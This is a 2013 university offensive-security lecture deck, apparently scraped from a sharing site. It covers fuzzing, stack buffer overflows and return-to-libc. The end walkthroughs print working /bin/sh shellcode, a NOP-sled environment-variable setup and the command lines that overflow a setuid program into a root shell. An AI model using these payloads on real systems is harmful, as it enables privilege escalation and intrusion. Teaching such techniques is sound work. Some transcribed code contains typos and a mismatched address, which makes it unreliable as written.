0% found this document useful (0 votes)

61 views

07 Fuzzing & Exploit Dev 101

Uploaded by

Sonya

Available Formats

Download as PPTX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

61 views

07 Fuzzing & Exploit Dev 101

Uploaded by

Sonya

Available Formats

Download as PPTX, PDF, TXT or read online on Scribd

You are on page 1/ 83

Fuzzing and Exploit

Development 101
CIS 4930 / CIS 5930
Offensive Security
Spring 2013
Announcement
● HW 3 problem 2 got revised, make sure you do the revised HW to turn in!
○ still deals with reversing the same application
○ reason it got revised:
■ the source code for the app was in the
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/reversing/FSU
_Reversing_binaries.zip

provided for the in class exercises

● Extra credit added
○ Real world crackme problem
■ should be a great challenge for anyone really wanting to do moar
RE!
■ more difficult than the whole HW 3
● worth up to +1% on final grade of extra credit
First the news...
Iranian Fordow uranium enrichment facility suffers massive
explosion, trapped 240 scientists underground
● http://www.reuters.com/article/2013/01/28/us-iran-nuclear-idUSBRE90R06820130128
● http://www.wnd.com/2013/01/sabotage-key-iranian-nuclear-facility-hit/
● http://www.telegraph.co.uk/news/worldnews/middleeast/iran/9831282/Mystery-over-explosion-at-Irans-Fordow-nuclear-site.html

I'll just let you guys

speculate...
More news...
Anonymous attacking US govt over Aaron Schwartz's death
used many *recent* java 0 days, and other exploits
+ insider threats
http://www.youtube.com/watch?v=WaPni5O2YyI

● There's always the debate than when Anon

claims to do something, if it is actually
Anon...
○ works both for and against them
Outline
1. Exploitation Theory
2. Fuzzing & Motivation
3. Types of values to fuzz
4. Some advanced fuzzing techniques
5. Exploit 101
6. Stack overview
7. Examples
8. Live Demo
Exploitation Theory
● VON NEUMANN ARCHITECTURE
○ most popular system model
■ 45+ years old and going strong
○ Cannot distinguish between data
& instructions
■ major reason for so much hacking
and malware
○ instructions and data stores in same
memory
○ allows for self modifying code
■ b/c old machines were hard to set up!!!
● took weeks to set up an old ENIAC!
○ systems are different now, but much much more complex
○ The ability to treat instructions as data allows for assemblers,
compilers, and other automated programming tools to exist
FANTASTIC READ:
http://www.nytimes.com/2012/10/30/science/rethinking-the-computer-at-80.html?pagewanted=all&_r=0
Exploitation Theory
● Harvard architecture
○ Uncommon->Common
■ made sense back in the tape/card days...
■ Now AVR micro controllers..
● Arduino
○ physically separates data and
instructions
■ entirely different address
spaces
○ separate signal pathway

○ most modern processors implement small parts of

a modified harvard architecture
■ to support loading a program from disk storage as data, and then
executing it
Other Architecture Ideas and
Trends
● Tagged architecture (theoretical)
○ Each piece of data in the system carries credentials
■ an encryption code that ensures that the data is
one that the system trusts
■ CPU will not process data with bad credentials
● Capability architecture (theoretical)
○ requires every software object to carry meta data
and specific permission information that describes its
access rights on the computer
■ check is done by a special part of the CPU
● Trusted Computing Base (TCB)
● Formal methods....
Formal Methods
What FM cannot do
● proof of correctness is valid only given valid
assumptions
● can only verify that a system meets its specification

What FM can do
● Delimit system/application boundaries
● characterize a system's behavior more precisely
● precisely define the system's desired properties
● prove a system meets its specifications

FM is really, really difficult

Exploitation Theory
● The computer industry has a bad habit of
repeating old mistakes
○ Driven by market forces
■ developing new CPU's / systems on
new computational models costs more
$$$$ for the consumer due to R&D

So lets get to it!

Exploitation Theory
● Most of security is putting bandages on
problems caused by old problems or design
choices

Sometimes, its like patching up an

old plane with duct tape!
Exploitation Theory
General Exploitation Theory:
Due to the inability to distinguish between instructions and data in Von
Neumann architecture machines, we can corrupt data with instructions and
hijack control flow. This is also because data contains control flow data that is
used to direct the execution of the instructions by the processor.

Most exploits can be generalized into a three step process

1. Some sort of memory corruption
2. Change / hijacking of control flow
3. Execution of the shellcode
Discovering Vulnerabilities
Three Primary Methods:
1. Source Code Auditing
a. Requires source code
2. Reverse Engineering
a. Can be done without source code.
b. Requires binary applications (i.e. not interpreted languages)
c. very time consuming and requires high technical skill
3. Fuzzing
a. Lots of tools / frameworks exist
b. Easy to make custom ones
c. Binary or source code availability is unimportant

Fuzzing primarily finds bugs. And not all bugs are vulnerabilities. The real trick
in fuzzing is finding exploitable bugs.

cited from [1]

What is fuzzing?
What is fuzzing?
● The process of sending specific data to an application, in hope to elicit
certain responses
● Specific?
○ Mutated data, generational data, edge cases, unanticipated datatypes,
etc.
● Certain?
○ crashes, errors, anomalous behavior, different application states...

Wikipedia defines fuzz testing as:

Fuzz testing or fuzzing is a software testing technique, often automated or semi-automated, that
involves providing invalid, unexpected, or random data to the inputs of a computer program. The
program is then monitored for exceptions such as crashes, or failing built-in code assertions or for
finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or
computer systems
Why?
Used effectively for:
● Bug Hunting
○ finding vulnerabilities (good guys & bad
guys, contractors, etc.)
○ fame & profit (pwn2own ~$60k for first
place)
● Software testing (SDL)
○ hugely important to Google, Mozilla,
Microsoft, Apple, etc.

cited from [1]

Fuzzing Phases
1. Identify Target (application)
2. Identify Inputs
3. Generate Fuzzed Data
a. Two methods for fuzzing data
i. Generation
ii. Mutation
4. Execute Fuzzed Data
5. Monitor for Exceptions
6. Determine Exploitability

cited from [1]

Methods for generating
fuzzed data
● Generational fuzzing:
○ Capable of building the data being sent based on data model
constructed by the fuzzer author
■ sometimes simple, dumb, or random
■ but can be highly efficient if written to combine good values in
interesting ways

● Mutational fuzzing:
○ starts with known good "template" and seed which is then modified (by
the fuzzing algorithm).
○ Output is limited by the template and seed
■ anything that is NOT in the template or seed will not be generated
○ i.e. if there are 10 options, and the template & seed are set to use only
8 of them, then the last 2 will never be generated.
Types of Targets & Goals
● Environment Variables
● Positional Arguments, flags, etc.
● File formats
● Network protocols
● Web apps
● etc...

Exploit/Attacker Goals:
● corrupt code/"business" logic
● Arbitrary/Malicious code execution
● permission escalation
● shell spawning / reverse shell
● etc..
Generating fuzzed data
What type of data should one fuzz an application with?
● Integer values
○ Border (edge) cases:
■ 0, 0xFFFFFFFF (2^32)
■ Leverage +n or -n cases
● malloc (.... + 1)
● Ranges:
• MAX32 – 16 <= MAX32 <= MAX32 + 16 Try to influence signed /
• MAX32 / 2 – 16 <= MAX32 / 2 <= MAX32 / 2 + 16 unsigned values: char short, int,
• MAX32 / 3 – 16 <= MAX32 / 3 <= MAX32 / 3 + 16 long, etc.
• MAX32 / 4 – 16 <= MAX32 / 4 <= MAX32 / 4 + 16
• MAX16 – 16 <= MAX16 <= MAX16 + 16 Unsigned value:
• MAX16 / 2 – 16 <= MAX16 / 2 <= MAX16 / 2 + 16 2^X
• MAX16 / 3 – 16 <= MAX16 / 3 <= MAX16 / 3 + 16
• MAX16 / 4 – 16 <= MAX16 / 4 <= MAX16 / 4 + 16 Signed value:
• MAX8 – 16 <= MAX8 <= MAX8 + 16 2^X / 2
• MAX8 / 2 – 16 <= MAX8 / 2 <= MAX8 / 2 + 16
• MAX8 / 3 – 16 <= MAX8 / 3 <= MAX8 / 3 + 16 cited from [1]
• MAX8 / 4 – 16 <= MAX8 / 4 <= MAX8 / 4 + 16
Generating fuzzed data,
cont
● String repetitions:
○ A*10, A*100, A*1000
■ $./program $(perl -e 'print "A" x1000')
○ Not just 'A', 'B' makes a difference on the heap, and in hard coded
anti-reversing checks!
● Delimiters
○ !@#$%^&*()-_=+{}|\;:’”,<.>/?~`
○ Varying length strings separated by delims
○ increasing length of delimiter:
■ User::::::::::::::::::::::::::::password
● Format Strings
○ %s and %n have greatest chance to trigger a fault
■ %s dereferences a stack value
■ %n writes to a pointer (another dereference)
○ Should fuzz long sequences (i.e. to cause crashes)

cited from [1]

Generating fuzzed data,
cont
● Character translations
○ 0xfe and 0xff are expanded into 4 characters under UTF16
○ 0xcc and 0xcd modifiers super and sub accents for UTF8 extended
encodings:
■ for instance: U̱̲ͫ́͗͆̽̈̆͞Ş͇̼̜̊̌ͮ̈̀̓̈

■ unpacked and decoded in python, this is: 'U','\xcd','\xab','\xcc','\

x81','\xcd','\x97','\xcd','\x86','\xcc','\xbd','\xcc','\x88','\xcc','\x86','\
xcd','\x9e','\xcc','\xb1','\xcc','\xb2','S','\xcc','\x8a','\xcc','\x8c','\xcd','\
xae','\xcc','\x88','\xcc','\x80','\xcd','\x83','\xcc','\x88','\xcc','\xa7','\
xcd','\x87','\xcc','\xbc','\xcc','\x9c'
■ see http://www.utf8-chartable.de/unicode-utf8-table.pl?start=768&number=128&names=-&utf8=0x
● Directory Traversal:
○ targeting web apps,network daemons, etc
○ ../../ and ..\..\ etc...
■ important to try different character encoding (%5C = '\' in unicode)
Generating fuzzed data,
cont
● Metacharacter / Command Injection
○ when targeting web apps, cgi scripts, network daemons
○ &&, ; --' and | characters
● File types
○ spoof magic number (unix)
■ 2-byte identifier at the beginning of a file
■ .gif's have magic numbers of GIF87a or GIF89a
○ spoof file extension
○ content-meta data (in web traffic)
■ i.e. via intercept proxy
Generating fuzzed data,
cont (Networking)
● Modeling Arbitrary Network Protocols
○ What if SMTP or some other proprietary protocol is tunneled over
HTTP to your web app?
■ or over ssh
● ad infinium
● Bit flipping for protocol headers / flags
● Fuzz with network time syncing protocols
○ perhaps to attack crypto on a network service :D
○ in use since 1985
File types
● shared objects,
● executable file formats,
● old file extension types (i.e. .php3 instead of .php)
● special folders (windows mainly)
● magic numbers
● poly-type files!
○ http://code.google.com/p/corkami/downloads/detail?name=CorkaMIX.
zip&can=2&q=
○ Proof of Concept to generate a file that is a valid PE, PDF, HTML (+
java script), AND .JAR (with Python) file!
A Fast File Fuzzer tool
http://rmadair.github.com/fuzzer/
● Python based mutational file fuzzer.
○ Uses PyDBG to monitor for signals of interest
● Client / Server architecture
○ any number of clients can connect to the server
■ each client handles some portion of the fuzzing
● creates mutated files clientside to fuzz a local copy of the
target program with
○ can distribute fuzzing in a cloud like fashion
■ split up the set of all the things to fuzz over each client, and run
them all in parallel
Environment Variables
● Are used by the user shell to do many things
● Are located on the stack AND can be set from the shell
● shellcode can be put into environment variables

Anyone in linux/unix systems can manipulate their environment variables

In windows, requires administrator access

Dynamically Linked Libraries
& LD_PRELOAD
● Linux/Unix only
● Prior to execution, dynamically linked libraries will be preloaded into
memory.
● The dynamic linker can be influenced into modifying its behavior either
during the program's execution or program's linking
○ LD_LIBRARY_PATH and LD_PRELOAD are 2 common avenues

● LD_PRELOAD is an environment variable

● Can compile dynamic-link libraries with GCC and the -fpic option
○ linking with the -shared option
● If you set LD_PRELOAD to the path of a shared object, that file will be
loaded before any other library (including C runtime, libc.so)
○ can rewrite malloc for any target binary
■ $ LD_PRELOAD=/attacker's/path/to/malloc.so target_program
● Also possible with debugger tools
DLL injection
● Technique for running code within the address space of another process by
forcing it to load a dynamic-link library
● at *least* 4 well known methods on Windows
○ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
■ every process that links to User32.dll will load all the DLLs listed
here (disabled with windows Vista and beyond)
○ Process manipulation functions
■ API functions to inject DLL after it starts
● i.e. CreateRemoteThread
■ Basic approach
● Get handle for target process
● allocate memory in target process for DLL injection
● create new thread in target process, with a start address at
LoadLibrary with the argument of the DLL to inject
● Then the OS call DllMain in the injected DLL
○ Windows Hooking Calls
○ Debugging tools (ollydbg, immunity, etc)
Vulnerability Analysis
Goal is to determine the exploitability of bugs.
● requires memory analysis, some reverse engineering, and payload
crafting... along with creativity and a lot of thought
○ It mainly comes down to reverse engineering the application some and
testing.
● No accurate tools exist for vuln analysis.
● !exploitable (http://msecdbg.codeplex.com/)
○ is a WinDBG extension
○ reports what is definately exploitable, probably exploitable, not
exploitable, and unknown
○ but is considered not very accurate.
● mona.py has an exploit generation feature that is useful for getting
started
Vulnerability Scoring
Common Vulnerability Scoring System http://www.first.org/cvss#
Six Base metrics (http://www.first.org/cvss/faq):
1. Access Vector: how well can a remote attack attack the target
2. Access Complexity: Measures the complexity of the attack required to
exploit the vuln, once he has gained access to the target
3. Authentication: Measures the number of times an attacker must
authenticate to the target system, in order to exploit the vuln
4. Confidentiality Impact: Measures the damage to confidentiality if the
vulnerability is successfully exploited
5. Availability Impact: Measures the damage to availability if the
vulnerability is successfully exploited
6. Integrity Impact: Measures the damage to the integrity of data and
systems if the vulnerability is successfully exploited

There are also Temporal, and Environmental metrics

Vulnerability Scoring is important for prioritizing incident response, and for
system administrators to prioritize proactive security measures
Exploit Development
101
Foreword
● Most of the initial techniques taught in this lecture will
not work on modern systems
○ b/c of ASLR, DEP, Stack Cookies, Safe SEH,
SEHOP, and etc...
● It is necessary to teach from the beginning though, to
see why these countermeasures came into play
● We will get into bypassing these countermeasures
● *But for now, the term VANILLA SYSTEM means a
system without any of these countermeasures active.
● The HAOE book's cd is a nice vanilla system
○ great for learning
Foreword continued...
● NOTE: Exploits must be developed with the
architecture in mind
○ Intel architecture is little endian:
■ mnemonic tip: Intel has more characters in
common with "little" than big
■ ie: 0xAABBCCDD gets stored in memory as:
\xDD \xCC \xBB \xAA (little end first)
○ Most other processors are big-endian
■ ie: 0xAABBCCDD gets stored in memory as:
\xAA \xBB \xCC \xDD (big end first)
Some processors now are bi-endian (i.e. ARM)
● We will start with the most common vulnerable bug: the
buffer overflow bug.
Definitions, Terminology
● Exploit (v.) - To take advantage of a vulnerability so that
the target system reacts in a manner other than which
the designer intended
● Exploit (n.) - The tool, set of instructions, or code that is
used to take advantage of a vulnerability. AKA Proof of
Concept (POC)
● 0day (n.) - An exploit for a vulnerability that has not
been publicly disclosed. Sometimes used to refer to the
vulnerability itself (i.e. hear about that Java 0day?)
● Shellcode (n.) - a set of instructions injected and then
executed by an exploited program
Exploit Planning
● After you've discovered a vulnerability
● What type of attacks make sense?
○ Stack overflow? Stack randomized?? is the Stack
Executable?
○ Canaries?
○ Other protection mechanisms (more on this later)
● How much space do we have?
● Insert code?
● Redirect execution?
○ return to lib c?
○ or other executable regions
■ perhaps writable and executable???
Buffer Overflows
● Quite simple. Occurs in C/C++ code.
● Overflows happen when too much stuff in too small a
space
○ i.e. "Hello World\0" being stored in char buf[6]
■ "World\0" is written into adjacent memory

● 2 categories of overflows:
○ Stack Overflows
○ Heap Overflows
Linux process memory
layout (windows differs!)
Program scratch space 0xFFFFFFFF
local (scoped) variables, RESERVED SPACE
high memory
environment variables, ------------------------------
passed arguments, STACK
return instruction pointers
------------------------------
RESERVED SPACE
dynamic space ------------------------------
malloc(...)
new(...) HEAP
------------------------------
Uninitialized global & static vars BSS
named BSS by old convention ------------------------------

Initialized global & static variables DATA

------------------------------

machine instructions / code segments 0x00000000

TEXT low memory
x86 Stack Details
[low memory]
When we think about the stack, it is convenient
to view it inverted from the standard model.
------------------------------
int function(char *buf){ buf2 $ESP
int var1 = 0; ------------------------------
char buf2[4]; var1
... ------------------------------
// some code saved frame pointer
... (SFP)
$EIP is here
------------------------------
return auth_flag;

growth direction
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
Many debuggers display the stack this way:
(the HAOE book also does it this way)
------------------------------
int function(char *buf){ buf2 $ESP
int var1 = 0; ------------------------------
char buf2[4]; var1
... ------------------------------
// some code saved frame pointer
... (SFP)
------------------------------
return auth_flag; $EIP is here
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
Lets walk through how it's constructed

int function(char *buf){

int var1 = 0;
char buf2[4];
...
// some code
...

return auth_flag;
}
int main(int argc, char *argv[]){
...
if(function(argv[1]) )
{
// do something ------------------------------ $ESP
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
Starting in main, $EIP eventually gets to
the function call

int function(char *buf){

int var1 = 0;
char buf2[4];
...
// some code
...
And the stack has
return auth_flag; no variables for the
} function up till this
int main(int argc, char *argv[]){ point.
...
if(function(argv[1]) )
{
// do something ------------------------------ $ESP
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
The compiled assembly code will push onto
the stack: the function parameters, the saved frame
pointer, and the return address, as such
int function(char *buf){
int var1 = 0;
char buf2[4];
... ------------------------------ $ESP
// some code saved frame pointer
... (SFP)
------------------------------
return auth_flag;
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
The compiled assembly code will then jump
into the function's code.

int function(char *buf){ $EIP will point here

int var1 = 0; (roughly)
char buf2[4];
... ------------------------------ $ESP
// some code saved frame pointer
... (SFP)
------------------------------
return auth_flag;
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
var 1 will get pushed onto the stack

int function(char *buf){

int var1 = 0; ------------------------------
char buf2[4]; $ESP
var1
... ------------------------------
// some code saved frame pointer
... (SFP)
------------------------------
return auth_flag;
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
buf2 will get pushed onto the stack

------------------------------
int function(char *buf){ buf2 $ESP
int var1 = 0; ------------------------------
char buf2[4]; var1
... ------------------------------
// some code saved frame pointer
... (SFP)
------------------------------
return auth_flag;
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
x86 Stack Details
[low memory]
Now lets see how data gets written onto the stack
with a strcpy(buf2, buf), where buf2 ="AAAAA"
------------------------------
int function(char *buf){ AAAA $ESP
int var1 = 0; ------------------------------ Data
char buf2[4]; A
...
writes
------------------------------
// some code saved frame pointer towards
... (SFP) high
return auth_flag;
overflow! ------------------------------ memory
}
int main(int argc, char *argv[]){ return address (ret)
... ------------------------------
if(function(argv[1]) ) *buf (function's
{ argument)
// do something ------------------------------
}
...
} main()'s stack frame
[high memory]
Linux process 0xFFFFFFFF

Memory view
Program scratch space ----STACK------->
local (scoped) variables,
environment variables,
passed arguments,
return instruction pointers RESERVED

dynamic space ------HEAP----->

malloc(...)
new(...)

Stack grows towards low memory

Heap grows towards high memory

Source:
http://www.tenouk.com/Bufferoverflo
wc/Bufferoverflow1c.html
0x00000000
Linux process 0xFFFFFFFF

Memory view..
● This is easier to comprehend
when looking at hex code, and
using GDB
● hard to comprehend when looking
at C/C++ source code
● This can differ per OS
○ Windows is different for
stack, heap, and shared
libraries (.dll in windows)
○ Likely the same in BSD
○ *Unsure about Solaris

Source:
http://www.tenouk.com/Bufferoverflo
wc/Bufferoverflow1c.html
0x00000000
Toy Example
Take these two code segments In which one is auth_flag
exploitable by stack
overflow?
int check_auth(char *password){ int check_auth(char *password){
int auth_flag = 0; char password_buffer[16];
char password_buffer[16]; int auth_flag = 0;

strcpy(password_buffer, password); strcpy(password_buffer, password);

... ...

return auth_flag; return auth_flag;

} }
Terminology: for an attacker,
return auth_flag; is an
Think about what gets put on
the stack, and the heap, and
execution control point in
which way they grow one of these
Construct their stacks
[low memory]
password_buffer
variable auth_flag variable
------------------------------ ------------------------------
auth_flag variable password_buffer
------------------------------ variable
saved frame pointer ------------------------------
(SFP) saved frame pointer
------------------------------ (SFP)
------------------------------

return address (ret)

------------------------------ return address (ret)
*password(function ------------------------------
argument) *password(function
------------------------------ argument)
------------------------------

main()'s stack frame

[high
memory]
Toy example solution...
Example was from HAOE book (pages 122-126)
auth_overflow.c versus auth_overflow2.c
Here's a trick:
int check_auth(char *password){ Data writes this direction in
int auth_flag = 0; source code in vanilla
char password_buffer[16]; systems
strcpy(password_buffer, password);
...

return auth_flag;
}
Targeting the stack frame
back to the auth_overflow2.c (page 126 in HAOE)
The stack is a LIFO structure auth_flag variable
int check_auth(char *password){
------------------------------
char password_buffer[16];
password_buffer
int auth_flag = 0;
variable
------------------------------
strcpy(password_buffer, password);
saved frame pointer
...
(SFP)
------------------------------
return auth_flag;
}
return address (ret)
int main(int argc, char *argv[]){
------------------------------
...
*password(function
if(check_auth(argv[1]) ){
argument)
// access granted
------------------------------
}
}
main()'s stack frame
Stack Frame Structure
each stack frame contains
● local variables for that function
------------------------------
● the return address local vars
○ so EIP can be restored ------------------------------
saved frame pointer
(SFP)
When a function returns (finishes) ------------------------------
● the stack frame is popped off
● and return address is used
return address (ret)
to restore the EIP ------------------------------
function arguments
------------------------------
If we can alter the return address, we can return
to other places in memory previous function()'s
stack frame
what could go wrong??? :)
Stack Frame Structure

------------------------------
local vars
This gets saved in the first ------------------------------
saved frame pointer
lines of a function, which is the (SFP)
function "prologue". ------------------------------

these get pushed prior return address (ret)

to jumping to the ------------------------------
function arguments
function
------------------------------

previous function()'s
stack frame
DEMO #1
We're going to exploit the stack frame to change the return
address to jump to shellcode that we've hidden in the
environment variables, to get a root shell

Goto slides @ the end to see walkthroughs

Return to lib c
Usually the stack is not executable (NX), as we will see
next time. LOW MEMORY
● Can't use shellcode on the stack THE STACK
○ no code injection! D: vuln buffer
● can still control EIP (by overriding a RET value on
stack data .....
the stack)
○ can point it elsewhere and still spawn a shell EBP
○ can point to dynamic-link library code!
■ must be a common dynamic library ret addr
■ must allow attacker to be flexible, argument1
and spawn shell or w/e
● libc! argument2 ....
● Basic planning process:
○ Determine address of system() HIGH MEMORY
○ determine address of "/bin/sh" in memory
○ determine address of exit()
Return to lib c
Basic execution of exploit:
1. fill up the vulnerable buffer up to the return address with
garbage data
2. overwrite the return address with the address of
system()
3. follow system() with the address of exit()
4. append the address of "/bin/sh"

● Its simple and sweet

When function calls happen
In general, CALL function_name does the following:

pushes in order on the stack: LOW MEMORY

● first the arguments THE STACK

● then return address vuln buffer

● then base pointer
stack data .....

EBP

ret addr

argument1

argument2 ....

HIGH MEMORY
Return to lib c
not NOP's cause
Hurdles: not executable!
● finding "/bin/sh" in memory
○ not uncommon, and can be found with LOW MEMORY
THE STACK
a memory analyzer (i.e. memfetch)
○ can be an environment variable! :D garbage data
● figuring out how to pass it to system()
garbage data
○ arguments get pushed onto the stack in
reverse order garbage data
○ pass a pointer to "/bin/sh" or put it there?
■ usually easier to pass a pointer! system() addr

12 bytes
exit() addr

● getting the vulnerable process to exit cleanly /bin/sh addr

○ by calling exit()
■ When system() returns, it will point here HIGH MEMORY
Inside system()
system(const char *command)

LOW MEMORY
THE STACK

....

....
RET Value
....

exit() addr

/bin/sh addr
argument 1
HIGH MEMORY
DEMO #2
return to lib c

Goto slides @ the end to see walkthroughs

Next Time
● Shellcode
● Heapspray
● SEH hacking
● Real World Countermeasures
○ ASLR
○ DEP
○ Stack Cookies
(/GS Protection)
○ Safe SEH
● And how to get around them
Resources
Linux process memory
layout
Program scratch space RESERVED SPACE 0xFFFFFFFF
local (scoped) variables, ------------------------------
environment variables, STACK
passed arguments,
return instruction pointers
------------------------------
RESERVED SPACE
------------------------------
dynamic space
malloc(...)
new(...) HEAP
------------------------------
BSS
Uninitialized global & static vars
named BSS by old convention ------------------------------
Initialized global & static variables
DATA

------------------------------

machine instructions / code segments 0x00000000

TEXT
Alternate view for linux
process memory layout
machine instructions / code segments-> Low
Text memory

Initialized global & static variables ----> Data

Uninitialized global & static vars ------> BSS
dynamic space ----------------->
malloc(...) HEAP
new(...)

Program scratch space ----------------->

local (scoped) variables,
environment variables,
passed arguments,
return instruction pointers STACK High
memory
Tools for testing/discovering
Buffer Overflows
Windows
● winDBG
● OllyDBG
● IDA
● immunityDBG
● python

Linux
● gdb, valgrind
● gcc/g++
● vi/vim/emacs
● bash and perl/python/ruby
● cat / netcat
● readelf
● objdump
● ltrace
● strace
● ROPeme
○ We will cover Return Orient Programming attacks next time
Exploit/Shellcode/Vuln
Databases
● http://www.exploit-db.com/search/
● http://projectshellcode.com/
● http://www.shell-storm.org/shellcode/

● http://nvd.nist.gov/
● http://cve.mitre.org/
Credits
Many thanks and credit goes to the following for the material on fuzzing:

[1] Mitch Adair - UTDallas Computer Security Group. http://utdcsg.org/csg/

Demo#1 Walkthrough
Use these commands to do what I did at
home.
An example
We're going to exploit the stack frame to change the return address to jump to
shellcode that we've hidden in the environment variables

Lets use auth_overflow2.c from HAOE.

With the live cd, compile auth_overflow2.c with the following commands:

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c -o auth_overflow2

reader@hacking:~/booksrc $ sudo chown root:root ./auth_overflow2
reader@hacking:~/booksrc $ sudo chmod u+s ./auth_overflow2
^ (set suid bit)

* I simply set things as root, and suid to easily verify if the exploit works,
otherwise might have to break out strace to prove the exploit worked, and that
you spawned a NEW shell, instead of returning to the old one :)

x/24s $esp + 0x1FF

Our shellcode
setup file "shellcode.hex" to contain:
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
Shellcode conversion
We need it in binary form. So run the following in bash:

$ for i in $(cat shellcode.hex); do echo -en $i; done > shellcode.bin

Then shellcode.bin will be in binary.

$cat shellcode.bin
this will give us a bunch of garbage (thats ok)
Environment Variables :)
put the shellcode into environment variables, with a healthy nop-sled.
$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)

check the result via:

$ echo $SHELLCODE
Finding the env vars on the
stack with gdb
$ gdb ./auth_overflow2 0xbffff9c7 is going to
be our target return
(gdb) break main address... right in the
(gdb) run middle of that sweet
//finds the environment variables on the stack NOP sled
(gdb) x/24s $esp + 0x1FF
0xbffff8ff: "SHELLCODE=", '\220' <repeats 190 times>...
0xbffff9c7:
"\220\220\220\220\220\220\220\220\220\2201�1�1�\231��\200j\
vXQh//shh/bin\211�Q\211�S\211��\200"
0xbffff9f5: "TERM=xterm"
0xbffffa00: "SHELL=/bin/bash"
0xbffffa10: "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-
gnome2"
0xbffffa4b: "WINDOWID=20971602"
0xbffffa5d: "USER=reader"
SMASH THE STACK
$ ./auth_overflow2 $(perl -e 'print "\xc7\xf9\xff\xbf"x40')
sh-3.2# whoami ^ Remember, x86 architecture is little
root endian
sh-3.2#

or use python:
$ ./auth_overflow2 $(python -c "print '\xc7\xf9\xff\xbf'*40")
Demo #2 walkthrough
ret to lib c
vuln.c
Provided by the HAOE book.

Really simple

int main(int argc, char *argv[])

{
char buffer[5];
strcpy(buffer, argv[1]);
return 0;
}

We're going to demonstrate return to libc with this

getenvaddr.c
Provided by the HAOE book.
Lets you find where on the stack an env variable is
We're going to use it to find our " /bin/sh" string
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]){

char *ptr;
if(argc < 3) {
printf("Usage: %s <environment variable> <target program>, argv[0]);
exit(0);
}
ptr = getenv(arg[1]); /*get env var location */
ptr += (strlen(argv[0] - strlen(argv[2]))*2; /*adjust for program name */
printf ("%s will be at %p\n", arg[1], ptr);
}
What we need to do
1. Find the address of system()
2. Find the address of exit()
a. if we want it to be clean (will seg fault otherwise)
i. seg faults can leave logs!
3. Find the address of " /bin/sh" on the stack
a. we're going to do this to put it in the environmental variables:
i. export BINSH=" /bin/sh"
4. Locate the RET value on the vulnerable program's stack
Find system() and exit()
int main(){
system();
exit();
}

Use GDB to find their addresses

Have all the addresses
system = 0xb7ed0d80
exit = 0xb7ec68f0
pointer to "/bin/sh" = 0xbffffe5d

These may differ for you

Now to find the RET value on the stack

can do it by binary fuzzing, or examining the stack values with GDB

the ret-to-libc exploit
$ ./vuln $(perl -e 'print "ABCD"x7 . '\x80\x0d\xed\xb7\xf0\x68\xec\xb7\x5b\xfe\xff\
xbf"')

Should give us:

sh-3.2#

Fuzzing - A Survey For Roadmap
No ratings yet
Fuzzing - A Survey For Roadmap
36 pages
Comp 272 Notes
0% (1)
Comp 272 Notes
26 pages
BsidesDelhi 2020 Hardik
No ratings yet
BsidesDelhi 2020 Hardik
45 pages
Stack Overflow Exploitation Explained
No ratings yet
Stack Overflow Exploitation Explained
37 pages
MBW SLIDES EN@hexleak
No ratings yet
MBW SLIDES EN@hexleak
112 pages
Week 05 Testing
No ratings yet
Week 05 Testing
54 pages
Fuzzing For Software Security Testing and Quality Assurance
No ratings yet
Fuzzing For Software Security Testing and Quality Assurance
5 pages
Cmiller CSW 2010
No ratings yet
Cmiller CSW 2010
90 pages
Fuzzing Defined: - Automated Testing Technique Used To Find Bugs in Software
No ratings yet
Fuzzing Defined: - Automated Testing Technique Used To Find Bugs in Software
13 pages
Offensive Software Exploitation: Ali Hadi
No ratings yet
Offensive Software Exploitation: Ali Hadi
41 pages
The Automated Exploitation Grand Challenge: Tales of Weird Machines
No ratings yet
The Automated Exploitation Grand Challenge: Tales of Weird Machines
58 pages
2b - Bufferoverflows
No ratings yet
2b - Bufferoverflows
24 pages
4_Fuzzing_up_to_SAGE
No ratings yet
4_Fuzzing_up_to_SAGE
40 pages
Book Sample Buffer
No ratings yet
Book Sample Buffer
70 pages
4_Fuzzing
No ratings yet
4_Fuzzing
57 pages
